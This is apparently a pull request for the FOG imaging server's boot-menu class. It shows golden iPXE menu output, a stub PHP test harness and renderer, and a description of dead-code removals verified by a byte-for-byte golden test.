+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+console && sanboot --drive 0 --no-describe || sanboot --no-describe --drive 0x80 || sanboot --no-describe --drive 0x81 || sanboot --no-describe --drive 0x82 || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/apps/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init.xz
+boot || goto MENU
+:fog.reg
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/apps/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/apps/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+
+########## bare-webroot ##########
+#!ipxe
+set fog-ip 10.0.0.1
+set fog-webroot fog
+set boot-url http://${fog-ip}/${fog-webroot}
+set setmacto ${net0/mac}
+set storage-ip 10.0.0.1
+set keymap us
+set arch ${buildarch}
+iseq ${arch} i386 && cpuid --ext 29 && set arch x86_64 ||
+goto get_console
+:console_set
+colour --rgb 0x00567a 1 ||
+colour --rgb 0x00567a 2 ||
+colour --rgb 0x00567a 4 ||
+cpair --foreground 7 --background 2 2 ||
+goto MENU
+:alt_console
+cpair --background 0 1 ||
+cpair --background 1 2 ||
+goto MENU
+:get_console
+console --picture http://10.0.0.1/fog/service/ipxe/bg.png --left 100 --right 80 && goto console_set || goto alt_console
+:MENU
+menu
+colour --rgb 0xff0000 0 ||
+cpair --foreground 1 1 ||
+cpair --foreground 0 3 ||
+cpair --foreground 4 4 ||
+item --gap Host is NOT registered!
+item --gap -- -------------------------------------
+item fog.local Boot from hard disk
+item fog.memtest Run Memtest86+
+item fog.reginput Perform Full Host Registration and Inventory
+item fog.reg Quick Registration and Inventory
+item fog.multijoin Join Multicast Session
+item fog.sysinfo Client System Information (Compatibility)
+choose --default fog.local --timeout 3000 target && goto ${target}
+:fog.local
+console && sanboot --drive 0 --no-describe || sanboot --no-describe --drive 0x80 || sanboot --no-describe --drive 0x81 || sanboot --no-describe --drive 0x82 || goto MENU
+:fog.memtest
+kernel memdisk initrd=memtest.bin iso raw
+initrd memtest.bin
+boot || goto MENU
+:fog.reginput
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=manreg
+imgfetch init.xz
+boot || goto MENU
+:fog.reg
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=autoreg
+imgfetch init.xz
+boot || goto MENU
+:fog.multijoin
+login
+params
+param mac0 ${net0/mac}
+param arch ${arch}
+param username ${username}
+param password ${password}
+param sessionJoin 1
+isset ${net1/mac} && param mac1 ${net1/mac} || goto bootme
+isset ${net2/mac} && param mac2 ${net2/mac} || goto bootme
+param sysuuid ${uuid}
+goto bootme
+:fog.sysinfo
+kernel bzImage loglevel=4 initrd=init.xz root=/dev/ram0 rw ramdisk_size=275000 web=http://10.0.0.1/fog/ consoleblank=0  rootfstype=ext4 storage=10.0.0.1:/images/ storageip=10.0.0.1 nvme_core.default_ps_max_latency_us=0 setmacto=${setmacto} loglevel=4 mode=sysinfo
+imgfetch init.xz
+boot || goto MENU
+:bootme
+chain -ar http://10.0.0.1/fog/service/ipxe/boot.php##params ||
+goto MENU
+autoboot
+

--- a/tests/lib/bootmenu-harness.php
+++ b/tests/lib/bootmenu-harness.php
@@ -1,0 +1,657 @@
+<?php
+/**
+ * A stub FOG runtime just large enough to render BootMenu's iPXE output.
+ *
+ * BootMenu extends FOGBase and reaches the database only through a handful
+ * of static helpers, so replacing FOGBase replaces the entire world it can
+ * see. Nothing here talks to MySQL, the network, or the filesystem outside
+ * a caller-supplied BASEPATH, which is what lets the boot menu be rendered
+ * byte-for-byte in a test.
+ *
+ * Fidelity notes -- these are the places where a lazy stub would silently
+ * produce the wrong golden file:
+ *
+ * 1. getSubObjectIDs('Service', ['name' => [...]], 'value', ..., 'name', ...)
+ *    returns setting VALUES ORDERED BY SETTING NAME, not in the order the
+ *    caller listed them. BootMenu destructures the result positionally with
+ *    list(), so the sort is load-bearing: it is the reason $serviceNames and
+ *    $ipxeGrabs are written in alphabetical order. The stub sorts the same
+ *    way, and throws on an unknown key rather than returning a short array,
+ *    because a missing row shifts every subsequent variable by one and would
+ *    bake a plausible-looking but wrong golden file.
+ * 2. fastmerge() and arrayInsertAfter() are copied verbatim from
+ *    FOGBase rather than reimplemented -- fastmerge's numeric-vs-string key
+ *    handling decides menu line ordering.
+ * 3. resolveHostname() never does DNS. A test that resolves a name is a test
+ *    that fails on an airplane.
+ *
+ * Not a mock framework by design: the house style is a plain PHP script with
+ * an exit status, runnable from the pre-commit hook.
+ */
+
+if (!defined('DS')) {
+    define('DS', DIRECTORY_SEPARATOR);
+}
+
+if (!function_exists('_')) {
+    /**
+     * gettext stand-in; the real one is unavailable without the web bootstrap.
+     *
+     * @param string $string the string to translate
+     *
+     * @return string
+     */
+    function _($string)
+    {
+        return $string;
+    }
+}
+
+/**
+ * Generic record stub standing in for a FOGController model.
+ */
+class StubModel
+{
+    /**
+     * Backing field data.
+     *
+     * @var array
+     */
+    protected $data = array();
+    /**
+     * Instantiates the record.
+     *
+     * @param array $data the field data
+     */
+    public function __construct(array $data = array())
+    {
+        $this->data = $data;
+    }
+    /**
+     * A record is valid when it carries a non-zero id, matching
+     * FOGController's own notion of validity closely enough for rendering.
+     *
+     * @return bool
+     */
+    public function isValid()
+    {
+        return !empty($this->data['id']);
+    }
+    /**
+     * Reads a field.
+     *
+     * @param string $key the field to read
+     *
+     * @return mixed
+     */
+    public function get($key = '')
+    {
+        if ('' === $key) {
+            return $this->data;
+        }
+        return array_key_exists($key, $this->data) ? $this->data[$key] : '';
+    }
+    /**
+     * Writes a field.
+     *
+     * @param string $key   the field to write
+     * @param mixed  $value the value to write
+     *
+     * @return self
+     */
+    public function set($key, $value)
+    {
+        $this->data[$key] = $value;
+        return $this;
+    }
+    /**
+     * Persistence is a no-op; nothing here has a database.
+     *
+     * @return bool
+     */
+    public function save()
+    {
+        return true;
+    }
+    /**
+     * Destruction is a no-op.
+     *
+     * @return bool
+     */
+    public function destroy()
+    {
+        return true;
+    }
+}
+
+/**
+ * MAC list stub. BootMenu stringifies this in _ipxeLog().
+ */
+class StubMac extends StubModel
+{
+    /**
+     * Renders the MAC as BootMenu expects.
+     *
+     * @return string
+     */
+    public function __toString()
+    {
+        return (string)$this->get('mac');
+    }
+    /**
+     * Imaging-ignore flag, read only on the tasking path.
+     *
+     * @return bool
+     */
+    public function isImageIgnored()
+    {
+        return (bool)$this->get('ignored');
+    }
+}
+
+/**
+ * Task stub. The rendering scenarios use invalid tasks so getTasking()
+ * falls through to printDefault(), which is where the menu is built.
+ */
+class StubTask extends StubModel
+{
+    /**
+     * Whether this is a snapin-only tasking.
+     *
+     * @return bool
+     */
+    public function isSnapinTasking()
+    {
+        return (bool)$this->get('snapin');
+    }
+}
+
+/**
+ * Storage node stub.
+ */
+class StubStorageNode extends StubModel
+{
+    /**
+     * Returns the owning group.
+     *
+     * @return StubModel
+     */
+    public function getStorageGroup()
+    {
+        return new StubModel(array('id' => 1, 'name' => 'default'));
+    }
+}
+
+/**
+ * Host stub, with the nested objects BootMenu reaches through.
+ */
+class StubHost extends StubModel
+{
+    /**
+     * Reads a field, materialising the nested objects BootMenu expects.
+     *
+     * @param string $key the field to read
+     *
+     * @return mixed
+     */
+    public function get($key = '')
+    {
+        switch ($key) {
+            case 'mac':
+                return new StubMac(
+                    array(
+                        'id' => 1,
+                        'mac' => $this->data['mac'] ?? '00:11:22:33:44:55',
+                        'ignored' => $this->data['imageignored'] ?? false,
+                    )
+                );
+            case 'task':
+                return new StubTask((array)($this->data['task'] ?? array()));
+            case 'inventory':
+                return new StubModel(
+                    array('id' => 1, 'sysuuid' => $this->data['sysuuid'] ?? '')
+                );
+        }
+        return parent::get($key);
+    }
+    /**
+     * Returns the assigned image.
+     *
+     * @return StubModel
+     */
+    public function getImage()
+    {
+        return new StubModel((array)($this->data['image'] ?? array()));
+    }
+}
+
+/**
+ * Collection stub returned by the *Manager classes.
+ */
+class StubManager
+{
+    /**
+     * The records this manager hands back.
+     *
+     * @var array
+     */
+    private $_rows = array();
+    /**
+     * Instantiates the manager.
+     *
+     * @param array $rows the records to serve
+     */
+    public function __construct(array $rows = array())
+    {
+        $this->_rows = $rows;
+    }
+    /**
+     * Filters the records the way FOGManagerController::find() would for the
+     * equality-on-a-field cases BootMenu actually uses. A filter value that
+     * is an array means "field IN (...)".
+     *
+     * @param mixed  $findWhere the filter
+     * @param string $whereOp   unused; kept for signature parity
+     * @param string $orderBy   field to sort by
+     *
+     * @return array
+     */
+    public function find($findWhere = array(), $whereOp = '', $orderBy = '')
+    {
+        $rows = $this->_rows;
+        foreach ((array)$findWhere as $field => $want) {
+            $rows = array_values(
+                array_filter(
+                    $rows,
+                    function ($row) use ($field, $want) {
+                        $have = $row->get($field);
+                        if (is_array($want)) {
+                            return in_array($have, $want);
+                        }
+                        return $have == $want;
+                    }
+                )
+            );
+        }
+        if ($orderBy) {
+            usort(
+                $rows,
+                function ($a, $b) use ($orderBy) {
+                    return $a->get($orderBy) <=> $b->get($orderBy);
+                }
+            );
+        }
+        return $rows;
+    }
+}
+
+/**
+ * Hook manager stub. Fires nothing, so the golden output is the
+ * plugin-free baseline, and records what was fired so a test can assert
+ * the integration points still exist.
+ */
+class StubHookManager
+{
+    /**
+     * Events seen, in order, as event name => argument keys.
+     *
+     * @var array
+     */
+    public $fired = array();
+    /**
+     * Records an event without altering its arguments.
+     *
+     * @param string $event     the event name
+     * @param array  $arguments the event arguments
+     *
+     * @return void
+     */
+    public function processEvent($event, $arguments = array())
+    {
+        $scalars = array();
+        foreach ((array)$arguments as $key => $value) {
+            if (null === $value || is_scalar($value)) {
+                $scalars[$key] = $value;
+            }
+        }
+        $this->fired[] = array(
+            'event' => $event,
+            'args' => array_keys((array)$arguments),
+            'scalars' => $scalars,
+        );
+    }
+    /**
+     * Registration is a no-op here.
+     *
+     * @param string $event    the event name
+     * @param mixed  $callback the callback
+     *
+     * @return void
+     */
+    public function register($event, $callback)
+    {
+    }
+}
+
+/**
+ * The stub FOGBase. BootMenu's entire view of the system is these members.
+ */
+class FOGBase
+{
+    /**
+     * The host being booted.
+     *
+     * @var StubHost
+     */
+    public static $Host;
+    /**
+     * The hook manager.
+     *
+     * @var StubHookManager
+     */
+    public static $HookManager;
+    /**
+     * The HTTP protocol string.
+     *
+     * @var string
+     */
+    public static $httpproto = 'http';
+    /**
+     * Settings, keyed by name, as the globalSettings table would hold them.
+     *
+     * @var array
+     */
+    public static $settings = array();
+    /**
+     * PXE menu rows, as StubModel records.
+     *
+     * @var array
+     */
+    public static $menus = array();
+    /**
+     * Images, as StubModel records.
+     *
+     * @var array
+     */
+    public static $images = array();
+    /**
+     * Storage nodes, as StubStorageNode records.
+     *
+     * @var array
+     */
+    public static $storagenodes = array();
+    /**
+     * Base constructor; nothing to bootstrap.
+     */
+    public function __construct()
+    {
+    }
+    /**
+     * Serves the object-id lookups BootMenu performs.
+     *
+     * Only the shapes BootMenu actually issues are supported; anything else
+     * throws, so a future caller cannot silently receive an empty array and
+     * bake a wrong golden file.
+     *
+     * @param string $object    the class to query
+     * @param array  $findWhere the filter
+     * @param string $getField  the field to return
+     *
+     * @throws Exception on an unsupported query or unknown setting
+     * @return array
+     */
+    public static function getSubObjectIDs(
+        $object = 'Host',
+        $findWhere = array(),
+        $getField = 'id',
+        $not = false,
+        $operator = 'AND',
+        $orderBy = 'name',
+        $groupBy = false,
+        $filter = 'array_unique'
+    ) {
+        if ('Service' === $object) {
+            $names = (array)($findWhere['name'] ?? array());
+            /*
+             * The real query orders by setting name and returns values.
+             * BootMenu destructures positionally, so sorting here is what
+             * keeps each value bound to the right variable.
+             */
+            sort($names);
+            $out = array();
+            foreach ($names as $name) {
+                if (!array_key_exists($name, self::$settings)) {
+                    throw new Exception(
+                        "harness: no fixture for setting '$name'; add it, "
+                        . "because a missing row shifts every later list() "
+                        . "variable by one"
+                    );
+                }
+                $out[] = self::$settings[$name];
+            }
+            return $out;
+        }
+        if ('StorageNode' === $object) {
+            $mgr = new StubManager(self::$storagenodes);
+            return array_map(
+                function ($n) {
+                    return $n->get('id');
+                },
+                $mgr->find($findWhere)
+            );
+        }
+        if ('PXEMenuOptions' === $object) {
+            $mgr = new StubManager(self::$menus);
+            return array_map(
+                function ($m) {
+                    return $m->get('id');
+                },
+                $mgr->find($findWhere)
+            );
+        }
+        if ('iPXE' === $object || 'MulticastSessionAssociation' === $object) {
+            return array();
+        }
+        throw new Exception("harness: unsupported getSubObjectIDs('$object')");
+    }
+    /**
+     * Reads a setting.
+     *
+     * @param string $key the setting name
+     *
+     * @return mixed
+     */
+    public static function getSetting($key)
+    {
+        return self::$settings[$key] ?? '';
+    }
+    /**
+     * Factory for the classes BootMenu asks for by name.
+     *
+     * @param string $class the class name
+     *
+     * @throws Exception on an unsupported class
+     * @return mixed
+     */
+    public static function getClass($class)
+    {
+        $args = func_get_args();
+        array_shift($args);
+        switch ($class) {
+            case 'PXEMenuOptionsManager':
+                return new StubManager(self::$menus);
+            case 'StorageNodeManager':
+                return new StubManager(self::$storagenodes);
+            case 'ImageManager':
+                return new StubManager(self::$images);
+            case 'MulticastSessionManager':
+                return new StubManager(array());
+            case 'KeySequence':
+                $seq = trim((string)($args[0] ?? ''));
+                if ('' === $seq) {
+                    return new StubModel(array());
+                }
+                return new StubModel(
+                    array('id' => 1, 'ascii' => '0x1b', 'name' => $seq)
+                );
+            case 'iPXE':
+                return new StubModel(array('id' => (int)($args[0] ?? 0)));
+            case 'Image':
+                return new StubModel((array)($args[0] ?? array()));
+        }
+        throw new Exception("harness: unsupported getClass('$class')");
+    }
+    /**
+     * Copied verbatim from FOGBase: its numeric-vs-string key handling
+     * decides the order menu lines land in.
+     *
+     * @param array $array1 the base array
+     *
+     * @return array
+     */
+    public static function fastmerge($array1)
+    {
+        $others = func_get_args();
+        array_shift($others);
+        foreach ((array)$others as &$other) {
+            foreach ((array)$other as $key => &$oth) {
+                if (is_numeric($key)) {
+                    $array1[] = $oth;
+                    continue;
+                } elseif (isset($array1[$key])) {
+                    $array1[$key] = $oth;
+                    continue;
+                }
+                unset($oth);
+            }
+            $array1 += $other;
+            unset($other);
+        }
+
+        return $array1;
+    }
+    /**
+     * Copied verbatim from FOGBase.
+     *
+     * @param string $key       the key to insert after
+     * @param array  $array     the array to work with
+     * @param string $new_key   the key to add
+     * @param mixed  $new_value the value to add
+     *
+     * @throws Exception
+     * @return void
+     */
+    protected static function arrayInsertAfter(
+        $key,
+        array &$array,
+        $new_key,
+        $new_value
+    ) {
+        if (!is_string($key) && !is_numeric($key)) {
+            throw new Exception(_('Key must be a string or index'));
+        }
+        $new = array();
+        foreach ($array as $k => &$value) {
+            $new[$k] = $value;
+            if ($k === $key) {
+                $new[$new_key] = $new_value;
+            }
+            unset($k, $value);
+        }
+        $array = $new;
+    }
+    /**
+     * Copied verbatim from FOGBase.
+     *
+     * @param mixed $ids the collection to reduce
+     *
+     * @return mixed
+     */
+    public static function minId($ids)
+    {
+        $ids = (array)$ids;
+        return empty($ids) ? 0 : min($ids);
+    }
+    /**
+     * Copied verbatim from FOGBase.
+     *
+     * @param mixed $ids the collection to reduce
+     *
+     * @return mixed
+     */
+    public static function maxId($ids)
+    {
+        $ids = (array)$ids;
+        return empty($ids) ? 0 : max($ids);
+    }
+    /**
+     * Deterministic stand-in: never performs DNS, so the test does not
+     * depend on the resolver.
+     *
+     * @param string $host the host to resolve
+     *
+     * @return string
+     */
+    public static function resolveHostname($host)
+    {
+        return trim((string)$host);
+    }
+    /**
+     * Login attempts are not exercised by the rendering scenarios.
+     *
+     * @param string $user the username
+     * @param string $pass the password
+     *
+     * @return StubModel
+     */
+    public static function attemptLogin($user, $pass)
+    {
+        return new StubModel(array());
+    }
+}
+
+/**
+ * Concrete stand-ins for the classes BootMenu instantiates with `new`.
+ */
+class StorageNode extends StubStorageNode
+{
+    /**
+     * Looks the node up by id from the fixture set.
+     *
+     * @param int $id the node id
+     */
+    public function __construct($id = 0)
+    {
+        $found = array();
+        foreach (FOGBase::$storagenodes as $node) {
+            if ($node->get('id') == $id) {
+                $found = $node->get();
+                break;
+            }
+        }
+        parent::__construct($found);
+    }
+}
+
+/**
+ * PXE menu option, looked up by id from the fixture set.
+ */
+class PXEMenuOptions extends StubModel
+{
+    /**
+     * Looks the row up by id.
+     *
+     * @param int $id the row id
+     */
+    public function __construct($id = 0)
+    {
+        $found = array();
+        foreach (FOGBase::$menus as $menu) {
+            if ($menu->get('id') == $id) {
+                $found = $menu->get();
+                break;
+            }
+        }
+        parent::__construct($found);
+    }
+}

--- a/tests/lib/bootmenu-render.php
+++ b/tests/lib/bootmenu-render.php
@@ -1,0 +1,203 @@
+<?php
+/**
+ * Renders one BootMenu scenario and prints the resulting iPXE script.
+ *
+ * Run as a child process by bootmenu-ipxe-output.test.php. It is a separate
+ * process because several BootMenu paths end in exit() -- noMenu() and the
+ * tasking path among them -- which a single-process test runner could not
+ * survive.
+ *
+ * Usage: php bootmenu-render.php <scenario-json> <path-to-bootmenu.class.php>
+ */
+
+require_once __DIR__ . '/bootmenu-harness.php';
+
+$scenario = json_decode($argv[1] ?? '{}', true);
+$classFile = $argv[2] ?? '';
+
+if (!is_array($scenario)) {
+    fwrite(STDERR, "render: could not decode scenario json\n");
+    exit(2);
+}
+if (!is_file($classFile)) {
+    fwrite(STDERR, "render: no such class file: $classFile\n");
+    exit(2);
+}
+
+/*
+ * BASEPATH decides whether _enrollSecureBootChoice() finds a MOK.der and
+ * therefore which of its two branches renders. Point it at a scenario-owned
+ * temp directory so both branches are reachable without touching a real
+ * install.
+ */
+$base = sys_get_temp_dir() . '/bootmenu-test-' . getmypid() . '/';
+@mkdir($base . 'service/secureboot', 0777, true);
+if (!empty($scenario['mok'])) {
+    file_put_contents($base . 'service/secureboot/MOK.der', 'test');
+}
+if (!defined('BASEPATH')) {
+    define('BASEPATH', $base);
+}
+
+/*
+ * Several BootMenu paths end in exit(), so the only reliable place to clean
+ * up the scenario's temp tree is a shutdown handler.
+ */
+register_shutdown_function(
+    function () use ($base) {
+        foreach (array('service/secureboot/MOK.der') as $file) {
+            if (is_file($base . $file)) {
+                unlink($base . $file);
+            }
+        }
+        foreach (array('service/secureboot', 'service', '') as $dir) {
+            if (is_dir($base . $dir)) {
+                @rmdir($base . $dir);
+            }
+        }
+    }
+);
+
+/**
+ * Default globalSettings values, mirroring commons/schema.php so the golden
+ * file reflects what a stock install actually emits.
+ */
+FOGBase::$settings = array_merge(
+    array(
+        'FOG_ADVANCED_MENU_LOGIN' => '0',
+        'FOG_BOOT_EXIT_TYPE' => 'sanboot',
+        'FOG_EFI_BOOT_EXIT_TYPE' => 'refind_efi',
+        'FOG_IMAGE_LIST_MENU' => '0',
+        'FOG_IPXE_BG_FILE' => 'bg.png',
+        'FOG_IPXE_HOST_CPAIRS' => "cpair --foreground 1 1 ||\n"
+            . "cpair --foreground 0 3 ||\ncpair --foreground 4 4 ||",
+        'FOG_IPXE_INVALID_HOST_COLOURS' => 'colour --rgb 0xff0000 0 ||',
+        'FOG_IPXE_MAIN_COLOURS' => "colour --rgb 0x00567a 1 ||\n"
+            . "colour --rgb 0x00567a 2 ||\ncolour --rgb 0x00567a 4 ||",
+        'FOG_IPXE_MAIN_CPAIRS' => 'cpair --foreground 7 --background 2 2 ||',
+        'FOG_IPXE_MAIN_FALLBACK_CPAIRS' => "cpair --background 0 1 ||\n"
+            . "cpair --background 1 2 ||",
+        'FOG_IPXE_VALID_HOST_COLOURS' => 'colour --rgb 0x00567a 0 ||',
+        'FOG_KERNEL_ARGS' => '',
+        'FOG_KERNEL_DEBUG' => '',
+        'FOG_KERNEL_LOGLEVEL' => '4',
+        'FOG_KERNEL_RAMDISK_SIZE' => '275000',
+        'FOG_KEYMAP' => '',
+        'FOG_KEY_SEQUENCE' => '',
+        'FOG_MEMTEST_KERNEL' => 'memtest.bin',
+        'FOG_NO_MENU' => '0',
+        'FOG_PXE_ADVANCED' => '0',
+        'FOG_PXE_BOOT_IMAGE' => 'init.xz',
+        'FOG_PXE_BOOT_IMAGE_32' => 'init_32.xz',
+        'FOG_PXE_BOOT_IMAGE_ARM' => 'arm_init.cpio.gz',
+        'FOG_PXE_HIDDENMENU_TIMEOUT' => '3',
+        'FOG_PXE_MENU_HIDDEN' => '0',
+        'FOG_PXE_MENU_TIMEOUT' => '3',
+        'FOG_REGISTRATION_ENABLED' => '1',
+        'FOG_TFTP_PXE_KERNEL' => 'bzImage',
+        'FOG_TFTP_PXE_KERNEL_32' => 'bzImage32',
+        'FOG_TFTP_PXE_KERNEL_ARM' => 'arm_Image',
+        'FOG_WEB_HOST' => '10.0.0.1',
+        'FOG_WEB_ROOT' => '/fog/',
+    ),
+    (array)($scenario['settings'] ?? array())
+);
+
+/**
+ * The stock pxeMenu rows, per commons/schema.php. pxeParams is only set on
+ * the rows schema.php gives one to, because _menuOpt() branches on whether
+ * a row has params at all.
+ */
+$loginParams = function ($extra) {
+    return "login\nparams\nparam mac0 \${net0/mac}\nparam arch \${arch}\n"
+        . "param username \${username}\nparam password \${password}\n"
+        . "param $extra\n"
+        . "isset \${net1/mac} && param mac1 \${net1/mac} || goto bootme\n"
+        . "isset \${net2/mac} && param mac2 \${net2/mac} || goto bootme";
+};
+$rows = array(
+    array(1, 'fog.local', 'Boot from hard disk', '1', '2', null, ''),
+    array(2, 'fog.memtest', 'Run Memtest86+', '0', '2', null, ''),
+    array(3, 'fog.reginput', 'Perform Full Host Registration and Inventory',
+        '0', '0', 'mode=manreg', ''),
+    array(4, 'fog.keyreg', 'Update Product Key', '0', '1', null,
+        $loginParams('keyreg 1')),
+    array(5, 'fog.reg', 'Quick Registration and Inventory', '0', '0',
+        'mode=autoreg', ''),
+    array(6, 'fog.deployimage', 'Deploy Image', '0', '1', null,
+        $loginParams('qihost 1')),
+    array(7, 'fog.multijoin', 'Join Multicast Session', '0', '2', null,
+        $loginParams('sessionJoin 1')),
+    array(8, 'fog.quickdel', 'Quick Host Deletion', '0', '1', null,
+        $loginParams('delhost 1')),
+    array(9, 'fog.sysinfo', 'Client System Information (Compatibility)',
+        '0', '2', 'mode=sysinfo', ''),
+    array(10, 'fog.debug', 'Debug Mode', '0', '3', 'mode=onlydebug', ''),
+    array(11, 'fog.advanced', 'Advanced Menu', '0', '4', null, ''),
+    array(12, 'fog.advancedlogin', 'Advanced Menu', '0', '5', null,
+        $loginParams('advLog 1')),
+    array(14, 'fog.secureboot', 'Enroll Secure Boot Key', '0', '2', null, ''),
+);
+FOGBase::$menus = array_map(
+    function ($r) {
+        return new StubModel(
+            array(
+                'id' => $r[0],
+                'name' => $r[1],
+                'description' => $r[2],
+                'default' => $r[3],
+                'regMenu' => $r[4],
+                'args' => $r[5],
+                'params' => $r[6],
+                'hotkey' => '0',
+                'keysequence' => '',
+            )
+        );
+    },
+    $rows
+);
+
+FOGBase::$storagenodes = array(
+    new StubStorageNode(
+        array(
+            'id' => 1,
+            'name' => 'DefaultMember',
+            'ip' => '10.0.0.1',
+            'path' => '/images/',
+            'isEnabled' => 1,
+            'isMaster' => 1,
+        )
+    ),
+);
+
+FOGBase::$images = array(
+    new StubModel(
+        array('id' => 1, 'name' => 'Win11', 'path' => 'win11', 'isEnabled' => 1)
+    ),
+    new StubModel(
+        array('id' => 2, 'name' => 'Ubuntu', 'path' => 'ubuntu', 'isEnabled' => 1)
+    ),
+);
+
+FOGBase::$Host = new StubHost((array)($scenario['host'] ?? array()));
+FOGBase::$HookManager = new StubHookManager();
+
+$_REQUEST = (array)($scenario['request'] ?? array());
+$_GET = $_REQUEST;
+
+require_once $classFile;
+
+if (!empty($scenario['hooks'])) {
+    /*
+     * Hook-payload mode: what a plugin receives is not visible in the emitted
+     * script, so it cannot be covered by the golden file. Swallow the script
+     * and report the payloads instead.
+     */
+    ob_start();
+    new BootMenu();
+    ob_end_clean();
+    echo json_encode(FOGBase::$HookManager->fired, JSON_PRETTY_PRINT), "\n";
+    exit(0);
+}
+
+new BootMenu();


### PR DESCRIPTION
## What this changes

Five write-only or no-op statements in `bootmenu.class.php`, plus one variable that was never defined at all.

| Site | Problem |
|---|---|
| `__construct()` | `$reboot = sprintf('reboot', "\n")` — format string with no placeholder, argument with nowhere to go |
| `__construct()` | `$kernel = $bzImage` assigned, never read; `$this->_kernel` is built from `$bzImage` directly |
| `_chainBoot()` | `$debug = $debug;` — self-assignment left over from a signature change |
| `printDefault()` | `PXEMenuOptionsManager->find('', '', 'id')` result assigned then overwritten by the `pxeRegOnly`-filtered query below — one wasted query per menu render |
| `__construct()` | `BOOT_ITEM_NEW_SETTINGS` passed `'webroot'` by reference with no `$webroot` ever assigned, so PHP created it at the call site and every plugin reading it received `NULL` |

The first four are pure removals. The `webroot` one is a real fix: the argument is now bound to the bare webroot, the same value `set fog-webroot` emits, so a plugin reading it gets what the name promises. Nested webroots (`/apps/fog/`) keep every segment.

Net: 18 lines changed in the class, 7 of them deletions.

## How it is proven

The whole claim for the removals is *"not one byte of emitted iPXE moves."* That is not something inspection can settle on a 2400-line file whose output is a program, so this adds a test that asserts it directly.

`tests/bootmenu-ipxe-output.test.php` renders 37 scenarios through a stub FOG runtime and byte-compares the emitted script against a golden file.

**The golden was generated from this file as it stood before the removals.** A passing run is therefore the proof that they were no-ops, not merely an assertion that they were.

```
bootmenu-ipxe-output: 37 scenarios, 101211 bytes rendered
bootmenu-ipxe-output: 2 hook-argument checks passed
PASS
```

Regenerating the golden from the changed source produces a byte-identical file.

### Scenario coverage

Chosen per rendering branch rather than by cross-product — every branch that emits different iPXE gets one scenario:

- every exit type (`sanboot`, `reboot`, `exit`, all three `grub` variants, `refind_efi`, and the unknown-value fallback)
- every arch (`x86_64`, `i386`, `arm64`) and the no-`platform` case
- hidden vs shown menu, and hidden-then-accessed — the only paths through `_chainBoot()`
- registered / pending / unregistered, which select the `pxeRegOnly` set and therefore which rows exist
- both Secure Boot branches (`MOK.der` present and absent)
- both arch-mismatch notices from `_hostOverride()`, and the `_echoSafe()` whitelist
- keymap handling including the Norwegian and Serbian special cases
- simple, nested, and bare webroots

Hook arguments are checked separately: what a plugin receives never appears in the emitted script, so the golden cannot cover it.

### The test has teeth

A golden test that cannot fail is decoration. This one was checked against five deliberate mutations, each of which it catches:

| Mutation | Result |
|---|---|
| menu timeout multiplier `* 1000` → `* 1001` | caught |
| drop `autoboot` from the bootme block | caught |
| sanboot drive order `0x80` → `0x81` | caught |
| weaken the `_echoSafe()` whitelist | caught |
| break the host kernel override | caught |

The two `webroot` hook checks fail against the current `dev-branch` source (`'webroot' was NULL`) and pass against this branch — so that fix is covered, not just claimed.

### Running it

```
php tests/bootmenu-ipxe-output.test.php            # compare against golden
php tests/bootmenu-ipxe-output.test.php --update   # regenerate golden
php tests/bootmenu-ipxe-output.test.php --against <file.php>
```

No database, no network, no PHPUnit — `tests/lib/bootmenu-harness.php` stubs `FOGBase` entirely, matching the existing `tests/route-filter-fields.test.php` convention (plain script, exit 0/1, runs anywhere). Each scenario runs in its own process because several `BootMenu` paths end in `exit()`.

Harness fidelity is where a lazy stub would quietly bake a wrong golden, so three things are deliberate: `getSubObjectIDs('Service', …)` sorts by setting name (which is why `$serviceNames` is written alphabetically — `list()` destructures positionally) and **throws** on an unknown key rather than returning a short array; `fastmerge()` and `arrayInsertAfter()` are copied verbatim from `FOGBase` because their key handling decides menu line ordering; and `resolveHostname()` never does DNS.

## Deliberately not changed

`$initrd` is assigned from `$imagefile` immediately **after** `BOOT_ITEM_NEW_SETTINGS` fires, so a plugin that sets the hook's `initrd` argument has its value discarded three lines later — `$this->_initrd` is built from `$imagefile` regardless. Swapping the two variables at that point is provably a no-op today, which the test confirms.

